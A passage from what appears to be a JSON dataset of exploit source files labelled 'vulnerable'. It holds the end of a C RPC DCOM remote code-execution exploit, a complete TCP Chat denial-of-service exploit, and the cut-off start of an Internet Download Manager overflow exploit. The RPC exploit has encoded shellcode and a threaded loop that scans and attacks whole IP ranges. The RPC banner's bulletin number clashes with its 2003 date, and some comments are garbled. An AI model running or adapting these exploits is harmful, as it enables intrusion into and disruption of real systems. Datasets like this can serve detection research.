\n\n\"\\x59\\xC9\\xC9\\xC9\\xC9\\xCA\\x14\\x1D\\xBD\\x2D\\x99\\x99\\x99\\xC9\\x66\\xCF\" \n\n\"\\x95\\x14\\xD5\\xBD\\xDD\\x14\\x8D\\xBD\\xAA\\x59\\xC9\\xF1\\xAC\\x99\\xAE\\x99\" \n\n\"\\xF1\\xB9\\x99\\xAC\\x99\\xF1\\xEA\\x99\\xED\\x99\\xF1\\xB9\\x99\\xEA\\x99\\xF1\" \n\n\"\\xFC\\x99\\xEB\\x99\\xF1\\xEC\\x99\\xEA\\x99\\xF1\\xED\\x99\\xB9\\x99\\xF1\\xF7\" \n\n\"\\x99\\xFC\\x99\\x12\\x45\\xC8\\xCB\\xC8\\xCB\\x14\\x1D\\xBD\\x29\\x99\\x99\\x99\" \n\n\"\\xC9\\x14\\x1D\\xBD\\x59\\x99\\x99\\x99\\xC9\\xAA\\x59\\xC9\\xC9\\xC9\\xC9\\xCA\" \n\n\"\\x14\\x1D\\xBD\\x79\\x99\\x99\\x99\\xC9\\x66\\xCF\\x95\\xC3\\xC0\\xAA\\x59\\xC9\" \n\n\"\\xF1\\xFD\\x99\\xFD\\x99\\xF1\\xB6\\x99\\xF8\\x99\\xF1\\xED\\x99\\xB9\\x99\\xF1\" \n\n\"\\xEA\\x99\\xEA\\x99\\xF1\\xEA\\x99\\xB9\\x99\\xF1\\xF6\\x99\\xEB\\x99\\xF1\\xF8\" \n\n\"\\x99\\xED\\x99\\xF1\\xED\\x99\\xEB\\x99\\xF1\\xF0\\x99\\xEA\\x99\\xF1\\xF0\\x99\" \n\n\"\\xF7\\x99\\xF1\\xFD\\x99\\xF4\\x99\\xF1\\xB9\\x99\\xF8\\x99\\xF1\\xEC\\x99\\xE9\" \n\n\"\\x99\\xF1\\xEB\\x99\\xF6\\x99\\xF1\\xF5\\x99\\xFE\\x99\\xF1\\xFA\\x99\\xF8\\x99\" \n\n\"\\xF1\\xF5\\x99\\xF6\\x99\\xF1\\xED\\x99\\xB9\\x99\\xF1\\xF7\\x99\\xFC\\x99\\x12\" \n\n\"\\x45\\xC8\\xCB\\x14\\x1D\\xBD\\x61\\x99\\x99\\x99\\xC9\\x14\\x1D\\xBD\\x91\\x98\" \n\n\"\\x99\\x99\\xC9\\xAA\\x59\\xC9\\xC9\\xC9\\xC9\\xCA\\x14\\x1D\\xBD\\xB1\\x98\\x99\" \n\n\"\\x99\\xC9\\x66\\xCF\\x95\\xAA\\x59\\xC9\\x66\\xCF\\x89\\xCA\\xCC\\xCF\\xCE\\x12\" \n\n\"\\xF5\\xBD\\x81\\x12\\xDC\\xA5\\x12\\xCD\\x9C\\xE1\\x9A\\x4C\\x12\\xD3\\x81\\x12\" \n\n\"\\xC3\\xB9\\x9A\\x44\\x7A\\xAB\\xD0\\x12\\xAD\\x12\\x9A\\x6C\\xAA\\x66\\x65\\xAA\" \n\n\"\\x59\\x35\\xA3\\x5D\\xED\\x9E\\x58\\x56\\x94\\x9A\\x61\\x72\\x6B\\xA2\\xE5\\xBD\" \n\n\"\\x8D\\xEC\\x78\\x12\\xC3\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\\x9A\" \n\n\"\\x44\\x12\\x9D\\x12\\x9A\\x5C\\x72\\x9B\\xAA\\x59\\x12\\x4C\\xC6\\xC7\\xC4\\xC2\" \n\n\"\\x5B\\x9D\\x99\\xCC\\xCF\\xFD\\x38\\xA9\\x99\\x99\\x99\\x1C\\x59\\xE1\\x95\\x12\" \n\n\"\\xD9\\x95\\x12\\xE9\\x85\\x34\\x12\\xF1\\x91\\x72\\x90\\x12\\xD9\\xAD\\x12\\x31\" \n\n\"\\x21\\x99\\x99\\x99\\x12\\x5C\\xC7\\xC4\\x5B\\x9D\\x99\\x71\\xEC\\x64\\x66\\x66\" \n\n\n\n\"\\x04\\x04\\x00\\x70\\x00\\x04\\x40\" \n\n\"\\x00\\x10\\x5c\\x00\\x78\\x01\\x07\\x00\\x78\\x01\\x07\\x00\\xa0\\x04\\x00\" \n\n\n\n\"\\x21\\x99\\x99\\x99\\x12\\x5C\\xC7\\xC4\\x5B\\x9D\\x99\\x71\"; \n\n\n\n\n\nint version(char ip[16], int sock) \n\n{ \n\n//un poco de ettercap... \n\n\n\n\n\nunsigned char peer0_0[] = { \n\n0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, \n\n0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18, \n\n0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00, \n\n0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, \n\n0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11, \n\n0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57, \n\n0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, \n\n0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, \n\n0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, \n\n0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00, \n\n0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, \n\n0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00, \n\n0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, \n\n0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, \n\n0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00, \n\n0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41, \n\n0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d, \n\n0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, \n\n0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, \n\n0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, \n\n0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97, \n\n0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0, \n\n0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00, \n\n0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, \n\n0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, \n\n0x02, 0x00, 0x00, 0x00 }; \n\n\n\n\n\nunsigned char peer0_1[] = { \n\n0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, \n\n0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, \n\n0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, \n\n0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, \n\n0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20, \n\n0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53, \n\n0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00, \n\n0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11, \n\n0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb, \n\n0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, \n\n0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, \n\n0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00, \n\n0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00, \n\n0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00, \n\n0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00, \n\n0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, \n\n0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, \n\n0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00, \n\n0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n\n0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, \n\n0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, \n\n0x07, 0x00 }; \n\n\n\n/* \n\n\n\nunsigned char win2kvuln[] = { \n\n0x04, 0x00, 0x00, 0x00, \n\n0x00, 0x00, 0x00, 0x00, \n\n0x04, 0x5d, 0x88, 0x8a, \n\n0xeb, 0x1c, 0xc9, 0x11, \n\n0x9f, 0xe8, 0x08, 0x00, \n\n0x2b, 0x10, 0x48, 0x60, \n\n0x02, 0x00, 0x00, 0x00, \n\n0x00, 0x00, 0x00, 0x00, \n\n0x04, 0x5d, 0x88, 0x8a, \n\n0xeb, 0x1c, 0xc9, 0x11, \n\n0x9f, 0xe8, 0x08, 0x00, \n\n0x2b, 0x10, 0x48, 0x60, \n\n0x02, 0x00, 0x00, 0x00}; \n\n*/ \n\nfd_set fds2; \n\nunsigned char buf[1024]; \n\n\n\nint l; \n\nstruct timeval tv2; \n\nFD_ZERO(&fds2); \n\nFD_SET(sock, &fds2); \n\ntv2.tv_sec = 6; \n\ntv2.tv_usec = 0; \n\n\n\nmemset(buf,'\\0',sizeof(buf)); \n\nsend(sock,(char *)peer0_0,sizeof(peer0_0),0); \n\nif(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) \n\n{ \n\nl=recv (sock, (char *)buf, sizeof (buf),0); \n\n// for(i=0;i<52;i++) \n\n// { \n\n// if (i==28) i=i+4; \n\n// if (buf[i+32]!=win2kvuln) \n\n// { \n\nsend(sock,(const char *)peer0_1,sizeof(peer0_1),0); \n\nif(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) \n\n{ \n\nmemset(buf,'\\0',sizeof(buf)); \n\nl=recv (sock, (char *)buf, sizeof (buf),0); \n\nif (l==32) \n\n{ \n\nclosesocket(sock); \n\nreturn(1);//winxp \n\n} \n\nelse \n\n{ \n\n#ifdef WIN32 \n\nclosesocket(sock); \n\n#else \n\nclose(sock); \n\n#endif \n\nreturn(0);//win2kby default. Nt4 not added.. \n\n} \n\n} \n\nelse return(-1); \n\n// } \n\n\n\n\n\n//} \n\n// closesocket(sock); \n\n// return(0);//win2k \n\n} \n\nclosesocket(sock); \n\nreturn(-1); //Unknown \n\n} \n\n/********************************************************************************/ \n\nint attack(char *ip1,bool atack) \n\n{ \n\nunsigned char rawData[1036]; \n\nmemcpy(rawData,rawData1,1036); \n\nunsigned char shellcode[50000]; \n\nchar ip[200]; \n\nstrcpy(ip,ip1); \n\nWSADATA WSAData; \n\nSOCKET sock; \n\nint len,len1; \n\nSOCKADDR_IN addr_in; \n\nshort port=135; \n\nunsigned char buf1[50000]; \n\nunsigned char buf2[50000]; \n\n\n\nprintf(\"%s\\n\",ip); \n\n//printf(\"RPC DCOM overflow Vulnerability discoveried by NSFOCUS\\n\"); \n\n//printf(\"Code by FlashSky,Flashsky xfocus org\\n\"); \n\n//printf(\"Welcome to our Site: http://www.xfocus.org\\n\"); \n\n//printf(\"Welcome to our Site: http://www.venustech.com.cn\\n\"); \n\n/* if(argc!=3) \n\n{ \n\nprintf(\"%s targetIP targetOS\\ntargets:\\n\",argv[0]); \n\nfor(int i=0;i<sizeof(target_os)/sizeof(v);i++) \n\nprintf(\"%d - %s\\n\",i,target_os.target); \n\nprintf(\"\\n%x\\n\",GETSTRCS(argv[1])); \n\nreturn; \n\n} \n\n*/ \n\n/* if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) \n\n{ \n\nprintf(\"WSAStartup error.Error:%d\\n\",WSAGetLastError()); \n\nreturn; \n\n} \n\n*/ \n\naddr_in.sin_family=AF_INET; \n\naddr_in.sin_port=htons(port); \n\naddr_in.sin_addr.S_un.S_addr=inet_addr(ip); \n\n\n\nif ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) \n\n{ \n\nprintf(\"Socket failed.Error:%d\\n\",WSAGetLastError()); \n\nreturn 0; \n\n} \n\nlen1=sizeof(request1); \n\n\n\nlen=sizeof(rawData); \n\n\n\nif(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) \n\n{ \n\nprintf(\"%s - connect failed\\n\",ip); \n\nreturn 0; \n\n} \n\n\n\nint vers=!version(ip,sock); \n\n\n\n// printf(\"%d\\n\",vers); \n\n// return; \n\n// int vers=1; \n\n\n\nFILE *fp; \n\n\n\n//\u00e7\u00a8\u00e2 \u00a5\u00ac \u00af \u00aa\u00a5\u00e2 \n\n// fp=fopen(\"shellcode\",\"rb\"); \n\n// fread(rawData,1,1036,fp); \n\n// fclose(fp); \n\n//\u00e2\u00a5\u00af\u00a5\u00e0\u00ec \u00ad\u00e3\u00a6\u00ad\u00ae \u00e1\u00e1\u00e7\u00a8\u00e2 \u00e2\u00ec \u00ad\u00a5\u00af\u00ae\u00e1\u00e0\u00a5\u00a4\u00e1\u00e2\u00a2\u00a5\u00ad\u00ad\u00ae \u00a8\u00e1\u00af\u00ae\u00ab\u00ad\u00ef\u00a5\u00ac\u00eb\u00a9 \u00e8\u00a5\u00ab\u00ab\u00aa\u00ae\u00a4! \n\n\n\nfp=fopen(\"bshell2\",\"rb\"); \n\nint sz=fread(shellcode,1,1024,fp); \n\nfclose(fp); \n\n// printf(\"%d\\n\",sz); \n\nfor(int i=0;i<sz;i++) \n\nrawData[i+0x71]=shellcode[i]; \n\n// fp=fopen(\"badfile.exe\",\"rb\"); \n\n// unsigned int sz1=fread(shellcode,1,50000,fp); \n\n// fclose(fp); \n\n// for(i=0;i<sz1;i++) \n\n// rawData[i+0x240]=shellcode; \n\n\n\n// fp=fopen(\"pac\",\"wb\"); \n\n// fwrite(rawData,1,1036,fp); \n\n// fclose(fp); \n\n\n\n// return; \n\n\n\n\n\n//\u008f\u00a5\u00e0\u00a5\u00a4 \u00e2\u00a5\u00ac \u00aa \u00aa \u00aa\u00e1\u00ae\u00e0\u00a8\u00e2\u00ec \u00a7 \u00af\u00a8\u00e8\u00a5\u00ac  \u00a4\u00e0\u00a5\u00e1 \u00e1\u00a2\u00ae\u00a1\u00ae\u00a4\u00ad\u00ae\u00a3\u00ae HEAP'a \n\n// DWORD heap=0x00180000; \n\n// int k=vers; \n\n// vers=1; \n\n// *(DWORD *)(rawData+0xae)=target_os[vers].heap; \n\n*(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap; \n\n//\u2019\u00a5\u00af\u00a5\u00e0\u00ec \u00ad\u00e3\u00a6\u00ad\u00ae \u00af\u00e0\u00ae\u00aa\u00e1\u00ae\u00e0\u00a8\u00e2\u00ec \u00ad \u00e8 \u00aa\u00ae\u00a4, \u00a4\u00ab\u00ef \u00e2\u00ae\u00a3\u00ae \u00e7\u00e2\u00ae\u00a1\u00eb \u00af\u00ae\u00ab\u00e3\u00e7\u00a8\u00e2\u00ec \u00ad\u00e3\u00a6\u00ad\u00eb\u00a9 \u00ad  \n\nXOR(rawData,0x71,sz,0x99); \n\n// XOR(rawData,0x240,sz1,0x99); \n\n//\u2019 \u00aa \u00a6\u00a5 \u00ad \u00ac \u00ad\u00e3\u00a6\u00ad\u00ae \u00a7 \u00af\u00a8\u00e1 \u00e2\u00ec \u00ad\u00e3\u00a6\u00ad\u00eb\u00a9 \u00ad \u00ac SEH \u00a8 JMP \n\nDWORD seh=target_os[vers].seh; \n\nDWORD jmp=target_os[vers].jmp; \n\n*(DWORD *)(rawData+0x22a)=jmp; \n\n*(DWORD *)(rawData+0x22e)=seh; \n\n// *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz)); \n\n*(WORD *)(rawData+0x62)=sz; \n\n\n\n\n\nmemcpy(buf2,request1,sizeof(request1)); \n\n*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2; \n\n*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2; \n\nmemcpy(buf2+len1,request2,sizeof(request2)); \n\nlen1=len1+sizeof(request2); \n\n\n\nmemcpy(buf2+len1,rawData,sizeof(rawData)); \n\nlen1=len1+sizeof(rawData); \n\n\n\nmemcpy(buf2+len1,request3,sizeof(request3)); \n\nlen1=len1+sizeof(request3); \n\nmemcpy(buf2+len1,request4,sizeof(request4)); \n\nlen1=len1+sizeof(request4); \n\n*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc; \n\n\n\n*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc; \n\n*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc; \n\n*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc; \n\n*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc; \n\n*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc; \n\n*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc; \n\n*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc; \n\n\n\nclosesocket(sock); \n\nif(atack) \n\n{ \n\nsock=socket(2,1,0); \n\nWSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL); \n\n\n\nif (send(sock,(const char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR) \n\n{ \n\nprintf(\"%s - send failed %d\\n\",ip,WSAGetLastError()); \n\nreturn 0; \n\n} \n\nelse {printf(\"%s - send exploit to %s\\n\",ip,target_os[vers].target);} \n\n\n\nlen=recv(sock,(char *)buf1,1000,NULL); \n\nbool ft=1; \n\nif(ft) \n\n{ \n\nint i=0; \n\nwhile(1) \n\n{ \n\nif (send(sock,(const char *)buf2,len1,0)==SOCKET_ERROR) \n\n{ \n\nprintf(\"\\nSend failed.Error:%d\\n\",WSAGetLastError()); \n\nreturn 0; \n\n} \n\nelse \n\n{ \n\nprintf(\"\\r%d\",++i); \n\n} \n\n//Sleep(1000); \n\n} \n\n} \n\nsend(sock,(const char *)buf2,len1,0); \n\nclosesocket(sock); \n\n} \n\nelse fprintf(fp1,\"%s %s\\n\",target_os[vers].target,ip); \n\n// fp=fopen(\"pac\",\"wb\"); \n\n// fwrite(rawData,1,1036,fp); \n\n// fclose(fp); \n\n} \n\nunsigned long thread_count=0; \n\nchar adr[200]; \n\n\n\nDWORD WINAPI ThreadProc( \n\nLPVOID lpParameter // thread data \n\n) \n\n{ \n\nthread_count++; \n\nattack(adr,0); \n\n\n\nthread_count--; \n\nreturn 0; \n\n} \n\n\n\nint main(int argc,char ** argv) \n\n{ \n\n//printf(\"%x %x\",OF_READWRITE,GETSTRCS(argv[1])); \n\n//return; \n\n//HFILE hf=_lopen(\"asd123\",0x1001); \n\n//printf(\"%x\",hf); \n\n//_lclose(hf); \n\n//return; \n\n\n\nif(argc!=2){\n\nfprintf(stderr, \"RPC universal exploit. Exploit MS09-039 vulnerability\\n\"\n\n\"unpatched host - to codee xecution\\n\"\n\n\"patched host - to DoS\\n\"\n\n\"based on original XFocus RPCDCOM2 exploit\\n\"\n\n\"modification and shellcode (c) by karlss0n\\n\"\n\n\"downloaded on www.k-otik.com\\n\"\n\n\"\\n\"\n\n\"usage: %s <target_ip>\\n\",\n\nargv[0]);\n\nreturn 10;\n\n}\n\n\n\nWSADATA wsaData; \n\n\n\nint wVersionRequested; \n\nwVersionRequested = MAKEWORD( 2, 2 ); \n\n\n\nint err = WSAStartup( wVersionRequested, &wsaData ); \n\nif ( err != 0 ) { \n\n/* Tell the user that we could not find a usable */ \n\n/* WinSock DLL. */ \n\nreturn 1; \n\n} \n\n\n\n\n\nif(strchr(argv[1],'.')) \n\n{ \n\nattack(argv[1],1); \n\nSleep(20000); \n\nreturn 2; \n\n} \n\nint cb=1,db=1; \n\ncb=atoi(argv[3]); \n\ndb=atoi(argv[4]); \n\nlong tm=atoi(argv[5]); \n\nfor(int c=cb;c<255;c++) \n\n{ \n\nfor(int d=db;d<255;d++) \n\n{ \n\nsprintf(adr,\"%s.%s.%d.%d\",argv[1],argv[2],c,d); \n\nif(thread_count>tm) while(thread_count>tm) Sleep(100); \n\nCreateThread(NULL,0,&ThreadProc,(void *)\"\",0,NULL); \n\nSleep(10); \n\nfflush(fp1); \n\n} \n\n} \n\nSleep(60000); \n\nfclose(fp1); \n\nreturn 0;\n\n\n\n}\n\n\n\n// milw0rm.com [2003-10-09]",
490        "vulnerable": true
491    },
492    {
493        "exploit_id": 1090,
494        "content": "/*\n\n\n\nTCP Chat(TCPX) DoS Exploit\n\n----------------------------------------\n\n\n\nResolve host... [OK]\n\n[+] Connecting... [OK]\n\nTarget locked\n\nSending bad procedure... [OK]\n\n[+] Server DoS'ed\n\n\n\nTested on Windows2000 SP4\n\nInfo: infamous.2hell.com / basher13@linuxmail.org\n\n\n\n*/\n\n\n\n#include <string.h>\n\n#include <winsock2.h>\n\n#include <stdio.h>\n\n\n\n#pragma comment(lib, \"ws2_32.lib\")\n\n\n\nchar doscore[] =\n\n\"*** TCP Chat 1.0 DOS Exploit \\n\"\n\n\"***-----------------------------------------------\\n\"\n\n\"*** Infam0us Gr0up - Securiti Research Team \\n\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\"\n\n\"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\\n\";\n\n\n\n\n\nint main(int argc, char *argv[])\n\n{\n\nWSADATA wsaData;\n\nWORD wVersionRequested;\n\nstruct hostent *pTarget;\n\nstruct sockaddr_in sock;\n\nchar *target;\n\nint port,bufsize;\n\nSOCKET inetdos;\n\n\n\nif (argc < 2)\n\n{\n\nprintf(\" TCP Chat(TCPX) DoS Exploit \\n\", argv[0]);\n\nprintf(\" ------------------------------------------\\n\", argv[0]);\n\nprintf(\" Infam0us Gr0up - Securiti Research\\n\\n\", argv[0]);\n\nprintf(\"[-]Usage: %s [target] [port]\\n\", argv[0]);\n\nprintf(\"[?]Exam: %s localhost 1234\\n\", argv[0]);\n\nexit(1);\n\n}\n\n\n\nwVersionRequested = MAKEWORD(1, 1);\n\nif (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;\n\n\n\ntarget = argv[1];\n\nport = 1234;\n\n\n\nif (argc >= 3) port = atoi(argv[2]);\n\nbufsize = 1024;\n\nif (argc >= 4) bufsize = atoi(argv[3]);\n\n\n\ninetdos = socket(AF_INET, SOCK_STREAM, 0);\n\nif(inetdos==INVALID_SOCKET)\n\n{\n\nprintf(\"Socket ERROR \\n\");\n\nexit(1);\n\n}\n\nprintf(\" TCP Chat(TCPX) DoS Exploit \\n\", argv[0]);\n\nprintf(\" ------------------------------------------\\r\\n\\n\", argv[0]);\n\nprintf(\"Resolve host... \");\n\nif ((pTarget = gethostbyname(target)) == NULL)\n\n{\n\nprintf(\"FAILED \\n\", argv[0]);\n\nexit(1);\n\n}\n\nprintf(\"[OK]\\n \");\n\nmemcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);\n\nsock.sin_family = AF_INET;\n\nsock.sin_port = htons((USHORT)port);\n\n\n\nprintf(\"[+] Connecting... \");\n\nif ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))\n\n{\n\nprintf(\"FAILED\\n\");\n\nexit(1);\n\n}\n\nprintf(\"[OK]\\n\");\n\nprintf(\"Target locked\\n\");\n\nprintf(\"Sending bad procedure... \");\n\nif (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)\n\n{\n\nprintf(\"ERROR\\n\");\n\nclosesocket(inetdos);\n\nexit(1);\n\n}\n\nprintf(\"[OK]\\n \");\n\nprintf(\"[+] Server DoS'ed\\n\");\n\nclosesocket(inetdos);\n\nWSACleanup();\n\nreturn 0;\n\n}\n\n\n\n// milw0rm.com [2005-07-06]",
495        "vulnerable": true
496    },
497    {
498        "exploit_id": 1091,
499        "content": "/*\n\n\n\n  Title : Internet Download Manager  =< 4.05 universal remote overflow Exploit\n\n  bug analyse and exploit code by : c0d3r \"Kaveh Razavi\" c0d3r@ihsteam.com\n\n  my advisory : http://www.ihsteam.com/advisory/download_manager_adv.txt\n\n  \n\n  ************************************************************************\n\n  \n\n  this bug is differnt from what was found in application called altnet\n\n  download manager .\n\n  if you read the code carefully you see that I left thingz for you .\n\n  well if you want to creat an html file linked to evil download offer\n\n  needed thingz are there , but in IE they are not usable cause exploit\n\n  string is bigger that IE input buffer .\n\n  I was analysing this bug and I was thinking about how to code an exploit\n\n  for this issue , then new Mozilla exploit came up ! yea the idea of saving\n\n  the exploit string into a file then copy/paste it to download manager \n\n  inpute url . there are other ways for sure . kiddies still can have fun\n\n  with this code just as I mentioned with a bit scripting in java or other \n\n  shits you can link exploit string which will be created in file exploit.txt\n\n  you can have a bad file , anyone using download manager can give a shell !\n\n  hint! : any other folder is being counted , so my suggestion is linking to \n\n  root webfolder .\n\n  sample usage shown in a 1 minute movie which can be downloaded at :\n\n  http://www.ihsteam.com/download/video/dlm.rar\n\n  \n\n  ************************************************************************\n\n\n\n  Exploit method : Structured Exception Handling known as SEH .\n\n  Targets : should work on all win2000 and win xp's even sp2 ,\n\n  Tested : winxp sp 1 and win2000 server sp 4\n\n  compile : ms visual c++ 6 : cl dlm.c\n\n  \n\n  ************************************************************************\n\n\n\n  Greetingz :\n\n  \n\n  www.ihsteam.com      LorD and NT , LorD always makes me happy with those\n\n  www.ihssecurity.com  Nasa , berkely , stanford ,... shells :>\n\n  www.exploitdev.com   yeah me and jamie are just started , u r0x jamie ,\n\n  www.metasploit.com   fewer words better ones , great !\n\n  www.class101.org     nice work is being done here ! class I used ur offsets :)\n\n  www.c0d3r.org        my home ,nth here right now but those nice Essence words.\n\n  other Folks and friends not mentioned here .\n\n\n\n*/ \n\n\n\n\n\n#include <stdio.h>\n\n#include <string.h>\n\n#include <windows.h>\n\n#define exploit \"exploit.txt\"\n\n#define NOP 0x90\n\n#define size 2519\n\n  \n\n  int main(int argc,char **argv)\n\n{\n\n\n\n/*\n\nchar crap1[]=  \n\n\"\\x3C\\x48\\x45\\x41\\x44\\x3E\"\n\n\"\\x3C\\x6D\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2D\\x65\"\n\n\"\\x71\\x75\\x69\\x76\\x3D\\x22\\x43\\x6F\\x6E\\x74\\x65\\x6E\"\n\n\"\\x74\\x2D\\x54\\x79\\x70\\x65\\x22\\x20\\x63\\x6F\\x6E\\x74\"\n\n\"\\x65\\x6E\\x74\\x3D\\x22\\x74\\x65\\x78\\x74\\x2F\\x68\\x74\"\n\n\"\\x6D\\x6C\\x3B\\x20\\x63\\x68\\x61\\x72\\x73\\x65\\x74\\x3D\"\n\n\"\\x69\\x73\\x6F\\x2D\\x38\\x38\\x35\\x39\\x2D\\x31\\x22\\x3E\"\n\n\"\\x3C\\x6D\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2D\\x65\"\n\n\"\\x71\\x75\\x69\\x76\\x3D\\x22\\x72\\x65\\x66\\x72\\x65\\x73\"\n\n\"\\x68\\x22\\x20\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x3D\\x22\"\n\n\"\\x33\\x3B\\x20\\x55\\x52\\x4C\\x3D\";\n\nchar crap2[]= \"\\x22\\x3E\";\n\nchar crap3[]=\n\n\"\\x3C\\x2F\\x68\\x65\\x61\\x64\\x3E\"\n\n\"\\x3C\\x2F\\x42\\x4F\\x44\\x59\\x3E\"\n\n\"\\x3C\\x2F\\x48\\x54\\x4D\\x4C\\x3E\";\n\n*/\n\n  char crap4[]= \"\\x31\\x31\\x2E\";\n\n\n\n\n\n// 